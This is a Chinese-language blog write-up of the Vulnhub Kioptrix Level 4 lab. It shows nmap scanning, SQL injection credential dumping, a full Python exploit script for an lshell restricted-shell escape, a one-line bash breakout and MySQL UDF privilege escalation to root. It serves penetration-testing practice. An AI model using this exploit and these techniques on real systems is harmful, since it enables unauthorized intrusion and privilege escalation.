<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>Vulnhub-Kioptrix_level_4 - Josephine&#39;s Blog</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="Josephine" /><meta name="description" content="靶机地址 https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 信息收集 获得 IP {% blockquote %} nmap -sn 192.168.56.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 13:19 CST Nmap scan report for 192.168.56.1 Host is up (0.00095s latency). Nmap scan report for 192.168.56.114 Host is up (0.0011s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 2.42 seconds {% endblockquote %} 端口枚举及服务" /><meta name="keywords" content="Hugo, theme, even" />






<meta name="generator" content="Hugo 0.80.0 with theme even" />


<link rel="canonical" href="https://bulletforkiller.github.io/post/2020-08-04-vulnhub-kioptrix-4/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">



<link href="/sass/main.min.2e81bbed97b8b282c1aeb57488cc71c8d8c8ec559f3931531bd396bf31e0d4dd.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">


<meta property="og:title" content="Vulnhub-Kioptrix_level_4" />
<meta property="og:description" content="靶机地址 https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 信息收集 获得 IP {% blockquote %} nmap -sn 192.168.56.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 13:19 CST Nmap scan report for 192.168.56.1 Host is up (0.00095s latency). Nmap scan report for 192.168.56.114 Host is up (0.0011s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 2.42 seconds {% endblockquote %} 端口枚举及服务" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://bulletforkiller.github.io/post/2020-08-04-vulnhub-kioptrix-4/" />
<meta property="article:published_time" content="2020-08-04T15:00:53+00:00" />
<meta property="article:modified_time" content="2020-08-04T15:00:53+00:00" />
<meta itemprop="name" content="Vulnhub-Kioptrix_level_4">
<meta itemprop="description" content="靶机地址 https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 信息收集 获得 IP {% blockquote %} nmap -sn 192.168.56.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 13:19 CST Nmap scan report for 192.168.56.1 Host is up (0.00095s latency). Nmap scan report for 192.168.56.114 Host is up (0.0011s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 2.42 seconds {% endblockquote %} 端口枚举及服务">
<meta itemprop="datePublished" content="2020-08-04T15:00:53+00:00" />
<meta itemprop="dateModified" content="2020-08-04T15:00:53+00:00" />
<meta itemprop="wordCount" content="1297">



<meta itemprop="keywords" content="Vulnhub," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Vulnhub-Kioptrix_level_4"/>
<meta name="twitter:description" content="靶机地址 https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 信息收集 获得 IP {% blockquote %} nmap -sn 192.168.56.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 13:19 CST Nmap scan report for 192.168.56.1 Host is up (0.00095s latency). Nmap scan report for 192.168.56.114 Host is up (0.0011s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 2.42 seconds {% endblockquote %} 端口枚举及服务"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">Even</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/">
        <li class="mobile-menu-item">Home</li>
      </a><a href="/post/">
        <li class="mobile-menu-item">Archives</li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags</li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">Categories</li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About</li>
      </a>
  </ul>

  


</nav>

  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">Even</a>
</div>





<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/">Home</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/post/">Archives</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/tags/">Tags</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/categories/">Categories</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/about/">About</a>
      </li>
  </ul>
</nav>

    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">Vulnhub-Kioptrix_level_4</h1>

      <div class="post-meta">
        <span class="post-time"> 2020-08-04 </span>
        <div class="post-category">
            <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"> 渗透测试 </a>
            </div>
        
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">文章目录</h2>
  <div class="post-toc-content always-active">
    <nav id="TableOfContents">
  <ul>
    <li>
      <ul>
        <li><a href="#靶机地址">靶机地址</a></li>
        <li><a href="#信息收集">信息收集</a>
          <ul>
            <li><a href="#获得-ip">获得 IP</a></li>
          </ul>
        </li>
        <li><a href="#端口枚举及服务扫描">端口枚举及服务扫描</a>
          <ul>
            <li><a href="#web-服务">Web 服务</a></li>
            <li><a href="#lshell-代码执行">lshell 代码执行</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#heading"></a></li>
    <li><a href="#exploit-lshell-pathing-vulnerability-in--0915">Exploit lshell pathing vulnerability in &lt;= 0.9.15.</a></li>
    <li><a href="#runs-commands-on-the-remote-system">Runs commands on the remote system.</a></li>
    <li><a href="#dronesec">@dronesec</a></li>
    <li><a href="#heading-1"></a>
      <ul>
        <li><a href="#权限提升">权限提升</a></li>
      </ul>
    </li>
  </ul>
</nav>
  </div>
</div>
    <div class="post-content">
      <h2 id="靶机地址">靶机地址</h2>
<p><a href="https://www.vulnhub.com/entry/kioptrix-level-13-4,25/">https://www.vulnhub.com/entry/kioptrix-level-13-4,25/</a></p>
<h2 id="信息收集">信息收集</h2>
<h3 id="获得-ip">获得 IP</h3>
<p>{% blockquote %}</p>
<p>nmap -sn 192.168.56.0/24
Starting Nmap 7.80 ( <a href="https://nmap.org">https://nmap.org</a> ) at 2020-08-03 13:19 CST
Nmap scan report for 192.168.56.1
Host is up (0.00095s latency).
Nmap scan report for 192.168.56.114
Host is up (0.0011s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.42 seconds</p>
<p>{% endblockquote %}</p>
<h2 id="端口枚举及服务扫描">端口枚举及服务扫描</h2>
<p>{% codeblock lang:sh %}</p>
<p>sudo nmap -sC -sV -p- -T4 -O 192.168.56.114</p>
<p>Starting Nmap 7.80 ( <a href="https://nmap.org">https://nmap.org</a> ) at 2020-08-03 13:33 CST
Nmap scan report for 192.168.56.114
Host is up (0.00064s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn&rsquo;t have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 08:00:27:90:48:67 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>Host script results:
|<em>clock-skew: mean: 1h59m58s, deviation: 2h49m41s, median: -1s
|<em>nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|</em>  System time: 2020-08-03T01:33:41-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|</em>  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)</p>
<p>OS and Service detection performed. Please report any incorrect results at <a href="https://nmap.org/submit/">https://nmap.org/submit/</a> .
Nmap done: 1 IP address (1 host up) scanned in 50.26 seconds</p>
<p>{% endcodeblock %}</p>
<h3 id="web-服务">Web 服务</h3>
<p>打开浏览器查看主页，是一个登陆页面：</p>
<p><img src="/images/2020-08-03/index.webp" alt="index"></p>
<p>扫描目录，最近发现了一个基于 <strong>rust</strong> 的扫描器 <a href="https://github.com/nxnjz/RustBuster"><strong>rustbuster</strong></a>，扫描的速度远远快于 dirb 之类的工具（Rust NB！）。但是并没有扫描出什么有价值的东西，发现两个目录 <strong>john</strong> 和 <strong>robert</strong>。其内部均有一个同名的 <strong>php</strong> 文件，但是访问就会重定向到登陆页面。</p>
<p>这里试探试探这个登录页面，输入账号 <strong>admin</strong>，密码 <strong>123</strong>，得到以下的结果：</p>
<p><img src="/images/2020-08-03/pass_error.webp" alt="pass_error"></p>
<p>如果输入一个单引号作为密码呢？</p>
<p><img src="/images/2020-08-03/pass_quote.webp" alt="pass_quote"></p>
<p>嗯，应该是存在 Sql 注入的。上 <strong>sqlmap</strong>：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span><span class="lnt">9
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">Database: members
Table: members
[2 entries]
+------+----------+-----------------------+
| id   | username | password              |
+------+----------+-----------------------+
| 1    | john     | MyNameIsJohn          |
| 2    | robert   | ADGAdsafdfwt4gadfga== |
+------+----------+-----------------------+
</code></pre></td></tr></table>
</div>
</div><p>拿到了用户名和密码。</p>
<h3 id="lshell-代码执行">lshell 代码执行</h3>
<p>这次有点意外，SSH 上去得到的 shell并不是一个常规的 bash 之类的，而是一个有限制的 shell，只能执行 <strong>cd、clear、echo、exit、help、ll、lpath、ls</strong>，而 <strong>; `` $()</strong> 这些都被禁止，一度陷入懵逼。直到执行 <strong>sudo</strong> 报错，才得到了一些更加有用的信息：</p>
<p><img src="/images/2020-08-03/lshell_crash.webp" alt="lshell_crash"></p>
<p>可知该 shell 是基于 <strong>Python</strong> 的 <strong>lshell</strong>，版本为 <strong>2.5</strong>。查看以下有没有漏洞：</p>
<p><img src="/images/2020-08-03/searchsploit.webp" alt="searchsploit"></p>
<p>有一个远程代码执行，但是 EXP 有一点问题，需要修改下，最后的 EXP 如下：</p>
<p>{% codeblock lang:python %}
import sys
import paramiko
import traceback
from time import sleep</p>
<h1 id="heading"></h1>
<h1 id="exploit-lshell-pathing-vulnerability-in--0915">Exploit lshell pathing vulnerability in &lt;= 0.9.15.</h1>
<h1 id="runs-commands-on-the-remote-system">Runs commands on the remote system.</h1>
<h1 id="dronesec">@dronesec</h1>
<h1 id="heading-1"></h1>
<p>if len(sys.argv) &lt; 4:
print &lsquo;%s: [USER] [PW] [IP] {opt: port}&rsquo; % (sys.argv[0])
sys.exit(1)</p>
<p>try:
print &lsquo;[!] &hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;..&rsquo;
print &lsquo;[!] lshell &lt;= 0.9.15 remote shell.&rsquo;
print &lsquo;[!] note: you can also ssh in and execute '/bin/bash'&rsquo;
print &lsquo;[!] &hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;&hellip;..&rsquo;
print &lsquo;[!] Checking host %s&hellip;&rsquo; % (sys.argv[3])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if len(sys.argv) == 5:
ssh.connect(sys.argv[3],
port=int(sys.argv[4]),
username=sys.argv[1],
password=sys.argv[2])
else:
ssh.connect(sys.argv[3], username=sys.argv[1], password=sys.argv[2])</p>
<pre><code># verify lshell
channel = ssh.invoke_shell()
while not channel.recv_ready():
    sleep(1)
ret = channel.recv(2048)

channel.send('help help\n')
while not channel.recv_ready():
    sleep(1)
ret = channel.recv(2048)

if not 'lshell' in ret:
    if 'forbidden' in ret:
        print '[-] Looks like we can\'t execute SSH commands'
    else:
        print '[-] Environment is not lshell'
    sys.exit(1)

# verify vulnerable version
channel.send('sudo\n')
while not channel.recv_ready():
    sleep(1)
ret = channel.recv(2048)
if not 'Traceback' in ret:
    print '[-] lshell version not vulnerable.'
    sys.exit(1)
channel.close()
ssh.close()

# exec shell
print '[+] vulnerable lshell found, preparing pseudo-shell...'
if len(sys.argv) == 5:
    ssh.connect(sys.argv[3],
                port=int(sys.argv[4]),
                username=sys.argv[1],
                password=sys.argv[2])
else:
    ssh.connect(sys.argv[3], username=sys.argv[1], password=sys.argv[2])

while True:
    cmd = raw_input('$ ')

    # breaks paramiko
    if cmd[0] is '/':
        print '[!] Running binaries won\'t work!'
        continue

    cmd = cmd.replace(&quot;'&quot;, r&quot;\'&quot;)
    cmd = 'echo __import__(\'os\').system(\'%s\')' % (cmd.replace(
        ' ', r'\t'))
    if len(cmd) &gt; 1:
        if 'quit' in cmd or 'exit' in cmd:
            break
        (stdin, stdout, stderr) = ssh.exec_command(cmd)
    out = stdout.read()
    print out.strip()
</code></pre>
<p>except paramiko.AuthenticationException:
print &lsquo;[-] Authentication to %s failed.&rsquo; % sys.argv[3]
except Exception, e:
print &lsquo;[-] Error: &lsquo;, e
print type(e)
traceback.print_exc(file=sys.stdout)
finally:
channel.close()
ssh.close()
{% endcodeblock %}</p>
<p>这个绕过原理也比较简单，应该是过滤不严，直接执行了 Python 命令，从而绕过限制执行系统命令，得到一个 shell：</p>
<p><img src="/images/2020-08-03/get_shell.webp" alt="get_shell"></p>
<p>经过尝试，直接执行 <strong>echo os.system('/bin/bash&rsquo;)</strong> 可以直接得到一个交互 shell：</p>
<p><img src="/images/2020-08-03/system.webp" alt="system"></p>
<h2 id="权限提升">权限提升</h2>
<p>到这一步感觉陷入一种困境，查看 SUID 文件和 <strong>/etc/sudoers</strong> 都没有发现什么有用的信息。虽然系统版本比较低，可以直接内核提权，但是感觉这样不利于学习，需要学习更多的姿势才对。上传 <strong>LinEnum.sh</strong>，查看有什么可疑之处：</p>
<p><img src="/images/2020-08-03/mysql.webp" alt="mysql"></p>
<p>可见 <strong>mysql</strong> 的 <strong>root</strong> 账户并没有密码，而且 mysqld 是以 <strong>root</strong> 运行的：</p>
<p><img src="/images/2020-08-03/mysql_priv.webp" alt="mysql_priv"></p>
<p>在上一步中得到的 shell 中直接登陆，使用 <strong>UDF</strong> 的方法提权，该数据库已经提前加载了 <strong>sys_exec</strong> 函数，直接用就好了：</p>
<p><img src="/images/2020-08-03/write_sudoers.webp" alt="write_sudoers"></p>
<p>接着直接 <strong>sudo su</strong> 吧，得到 root shell：</p>
<p><img src="/images/2020-08-03/rooted.webp" alt="rooted"></p>

    </div>

    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">文章作者</span>
    <span class="item-content">Josephine</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">上次更新</span>
    <span class="item-content">
        2020-08-04
        
    </span>
  </p>
  
  
</div>
<footer class="post-footer">
      <div class="post-tags">
          <a href="/tags/vulnhub/">Vulnhub</a>
          </div>
      <nav class="post-nav">
        <a class="prev" href="/post/2020-08-10-vulnhub-mr-robot/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">Vulnhub - Mr Robot</span>
            <span class="prev-text nav-mobile">上一篇</span>
          </a>
        <a class="next" href="/post/2020-07-31-vulnhub-kioptrixvm3/">
            <span class="next-text nav-default">Vulnhub-KioptrixVM3</span>
            <span class="next-text nav-mobile">下一篇</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        

  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
  <a href="https://bulletforkiller.github.io/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" href="https://gohugo.io">Hugo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  

  <span class="copyright-year">
    &copy; 
    2019 - 
    2021<span class="heart"><i class="iconfont icon-heart"></i></span><span>Josephine</span>
  </span>
</div>

    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>



<script type="text/javascript" src="/js/main.min.c12618f9a600c40bd024996677e951e64d3487006775aeb22e200c990006c5c7.js"></script>








</body>
</html>
